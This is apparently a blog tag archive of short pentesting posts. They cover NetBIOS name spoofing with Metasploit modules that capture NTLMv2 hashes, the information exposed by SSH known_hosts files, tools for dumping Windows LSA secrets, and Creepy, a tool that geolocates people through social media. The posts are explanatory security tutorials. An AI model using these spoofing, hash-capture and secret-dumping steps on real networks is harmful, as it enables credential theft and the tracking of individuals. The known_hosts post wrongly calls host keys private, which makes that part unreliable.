Tag Archive: pentesting

NetBIOS spoofing

There have been several posts regarding NetBIOS spoofing, and i thought i would write something up regarding it.

When a windows machine tries to access a resource on the network it will try and resolve the name of the resource to an IP address. It does this by first searching it’s host file, and if that fails (and generally does), it will then try DNS. Well DNS doesnt have records for everything, so the windows machine tries NetBIOS and if you dont have a WINS server setup, it will send a broadcast message asking if anyone knows about that resource. Perfect, we can respond with a machine that we control.

How often to machines fall back to NetBIOS queries? Laptops that are part of a domain on a different wireless network often query for resources. Often companies have a internal website configured. Also most web browsers when you perform a search they have to determine if you are trying to access a local resource or performing a search.

msf  auxiliary(smb) > use auxiliary/spoof/nbns/nbns_response
msf  auxiliary(nbns_response) > show options

Module options (auxiliary/spoof/nbns/nbns_response):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   REGEX      .*               yes       Regex applied to the NB Name to determine if spoofed reply is sent
   SPOOFIP    yes       IP address with which to poison responses
   TIMEOUT    500              yes       The number of seconds to wait for new data

msf  auxiliary(nbns_response) > run
[*] Auxiliary module execution completed

[*] NBNS Spoofer started. Listening for NBNS requests...
msf  auxiliary(nbns_response) > use auxiliary/server/capture/smb
msf  auxiliary(smb) > show options

Module options (auxiliary/server/capture/smb):

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
   CHALLENGE   1122334455667788  yes       The 8 byte challenge
   JOHNPWFILE                    no        The prefix to the local filename to store the hashes in JOHN format
   SRVHOST           yes       The local host to listen on. This must be an address on the local machine or
   SRVPORT     445               yes       The local port to listen on.
   SSL         false             no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

msf  auxiliary(smb) > set JOHNPWFILE /pentest/passwords/wordlists/darkc0de.lst
JOHNPWFILE => /pentest/passwords/wordlists/darkc0de.lst
msf  auxiliary(smb) > run
[*] Auxiliary module execution completed

[*] Server started.
msf  auxiliary(smb) > [*] 2012-01-29 09:45:40 -0500
NTLMv2 Response Captured from
USER:keith DOMAIN:cheeze-it OS: LM:
NTHASH:******hash************* NT_CLIENT_CHALLENGE:****************************************************

SSH KnownHosts

When you SSH into a server for whatever reason Linux systems store the machine name/IP address and the private key. It does this so if you get prompted for the public key again then either you are compromised and are part of a man in the middle attack, or the private key on the server has changed. This information is stored in your user profile under .ssh/known_hosts

For an pentester this information could be useful. If your password is compromised an attacker can look at this file and see what machines you have ssh’ed into, would they be able to get into using the same username and password? Possibly. SSH has a new feature where it will hash each entry. To do so put ‘HashKnownHosts yes’ in .ssh/config or in /etc/ssh/ssh_config (for all users). Then run ‘ssh-keygen -H’ to hash your current entries.

The ‘|’ are separators, everything between them represent a value. The first is the hash_magic, i’m not really sure what that is for. the 2nd is the salt which is encoded in base 64, the 3rd is the hashed IP/Hostname, and the last is the private key for the host. The Hostname/IP is encoded using SHA1 and the salt, then encoded in base 64.



Windows has 2 types of security, local and domain. LSA or Local Security Authority is defined by Microsoft as “A protected subsystem that authenticates and logs users onto the local system. LSA also maintains information about all aspects of local security on a system, collectively known as the Local Security Policy of the system. In addition to housing policy information, the LSA provides services for translation between names and security identifiers (SIDs).” The process that is responsible for this is Local Security Authority Subsystem Service (LSASS.EXE)

The private database for LSA is called LSA Secrets and they are stored HKEY_LOCAL_MACHINESecurityPolicySecrets. These registry settings are all encrypted, but you should be able to find some software that allows you to view this information, LSADump, LSASecretsDump, pwdumpx, gsecdump, and Cain & Able are just a few that can.


Tool: Creepy

Creepy is a utility written in python that gathers geolocation from various social networking and image hosting services. It presents this info in a map in the application. This is a useful utility in the information stage for pentesters or social engineers. Go to the tool’s website to get more information or to download the application.